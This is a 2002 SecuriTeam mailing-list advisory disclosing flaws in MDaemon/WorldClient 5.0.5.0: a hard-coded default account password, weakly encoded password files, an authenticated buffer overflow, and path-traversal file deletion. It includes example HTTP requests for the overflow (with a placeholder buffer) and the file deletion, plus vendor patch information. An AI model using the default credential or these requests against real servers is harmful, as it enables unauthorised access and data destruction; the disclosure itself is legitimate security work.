[NT] Multiple Vulnerabilities in MDaemon and WorldClient

From: support@securiteam.com
Date: 05/08/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Wed,  8 May 2002 08:38:31 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Multiple Vulnerabilities in MDaemon and WorldClient
------------------------------------------------------------------------

SUMMARY

 <http://www.deerfield.com/products/mdaemon/worldclient/> WorldClient,
integrated with MDaemon Pro 5.0, allows users access to their e-mail
accounts, folders, address books, and spell checkers with any standard web
browser. By using a web browser to access e-mail, users can access their
e-mail from anywhere on the Internet. Unlike typical e-mail client
applications, WorldClient does not require reconfiguration to use, and
does not leave any traces of messages on the Internet terminal; an ideal
feature for anyone that travels. WorldClient also stores all of the
messages on the MDaemon server, not a third party server, a key for anyone
that uses e-mail for sensitive or confidential communications. The product
has been found to contain multiple vulnerabilities.

DETAILS

Vulnerable systems:
 * MDaemon or WorldClient version 5.0.5.0

Immune systems:
 * MDaemon or WorldClient version 5.0.6.0

1. Default Username with default password
MDaemon has a default user called MDaemon which is used by the application
itself. When trying to change any setting of this user and error pops up:
"The MDaemon account is built in system mail account. It is critical for
system purposes and should not be edited needlessly. Attempting to use the
MDaemon system account as if it were a regular mail account can cause
unpredictable results."

By decoding the password (as described in problem 2), it was easy to
discover that the password for this account is always MServer.

2. Weak encryption for Password files
The password is by default stored in a file called userlist.dat in the
MDaemon/App directory. The location of this file is usually
C:\MDaemon\App\userlist.dat.

The password is encrypted using a weak encryption making it very easy to
decode. Each character is changed by a static offset and the final result
is base64 encoded.

3. Buffer Overflow in WorldClient
There is a buffer overflow in WorldClient. When an attacker executes
arbitrary code using this vulnerability, such code is executed as SYSTEM
on a Windows 2000 machine.

The overflow occurs when trying to create a folder with a long name by
using the Web interface (WorldClient). In my tests, the EIP is overwritten
at 0x0123FFA8. The folder name has to be about 1000 characters long to
cause the overflow. It is important to note that the client exploiting
this issue has to be authenticated when sending the exploit string.

4. Deletion of any file on the same drive as WorldClient
When creating a new e-mail message, users can attach files. The attached
files are stored in the user's folder. While WorldClient checks for
filenames which contain possibly dangerous characters such as "../" when
creating a new file, it does not put this check when deleting attached
files. This means that any file on the same drive as MDaemon can be
deleted, possibly leading to a Denial of Service.

Exploit Examples:
Buffer Overflow Example:
POST /WorldClient.cgi?Session=xxxx&View=Options-Folders&Reload=Yes
HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461)
Host: victim:3000
Content-Length: 1636
Connection: Keep-Alive
Cookie: User=MDaemon; Lang=en; Theme=Standard; Session=xxxxx

OldFolderParent=&OldFolder=&FolderParent=&Folder=&NewFolder=AAAAAAAAAAAA
AAA[BUFFER_HERE_1000+chars]&NewFolderParent=&Create=Create&Folder%3AInbo
x=Inbox&Folder%3ADrafts=Drafts&Folder%3ASent=Sent&Folder%3ATrash=Trash&F
older%3As=s

File Deletion Example:
POST /WorldClient.cgi?Session=xxxx&View=Compose-Attach HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer:
http://victom.com:3001/WorldClient.cgi?Session=xxxx&View=Options-Folders
Content-Type: multipart/form-data;
boundary=---------------------------7d2851b9074c
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461)
Host: victim:3001
Content-Length: 407
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: User=MDaemon; Lang=en; Theme=Standard; Session=xxxx

-----------------------------7d2851b9074c
Content-Disposition: form-data; name="Attachment"; filename=""
Content-Type: application/octet-stream

-----------------------------7d2851b9074c
Content-Disposition: form-data; name="Attachments"

.\..\test.txt
-----------------------------7d2851b9074c
Content-Disposition: form-data; name="Remove"

Remove
-----------------------------7d2851b9074c--

Fix:
The issue has been fixed on May 7 2002.
An update can be found at:
 <ftp://ftp.altn.com/MDaemon/Release/md506_en.exe>
ftp://ftp.altn.com/MDaemon/Release/md506_en.exe - English
 <ftp://ftp.altn.com/MDaemon/Release/md506_ge.exe>
ftp://ftp.altn.com/MDaemon/Release/md506_ge.exe - German

This fixes issues #1,#3 and #4.

To prevent users from decoding the userlist.dat file (issue #2) it was
recommended by the vendor that the correct NTFS permissions are in place.

ADDITIONAL INFORMATION

The information has been provided by <mailto:obscure@eyeonsecurity.net>
Obscure.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • RE: Multiple Vulnerabilities in MDaemon + WorldClient
    ... This will at least deny login to the mdaemon account via WorldClient. ... Just a quick fix until you can upgrade to the newest version and patch... ...
    (Bugtraq)
  • Multiple Vulnerabilities in MDaemon + WorldClient
    ... Multiple Vulnerabilities in MDaemon + WorldClient ... Several Vulnerabilities - one of which gives system access. ... "The MDaemon account is built in system mail account. ...
    (NT-Bugtraq)
  • Multiple Vulnerabilities in MDaemon + WorldClient
    ... Multiple Vulnerabilities in MDaemon + WorldClient ... Several Vulnerabilities - one of which gives system access. ... "The MDaemon account is built in system mail account. ...
    (Bugtraq)
  • [EXPL] Remote Buffer Overflow in MDaemon (Exploit)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Get your security news from a reliable source. ... Overflow in MDaemon, ... int fix_shellcode ...
    (Securiteam)
  • [NT] Remote Buffer Overflow in MDaemon (Raw Message Handler)
    ... Get your security news from a reliable source. ... " <http://shop.mdaemontools.com/mdaemon.php> MDaemon offers a full range ... message file in the raw queue directory of MDaemon mail server. ... In the meantime it is easy to disable Form2Raw by following the ...
    (Securiteam)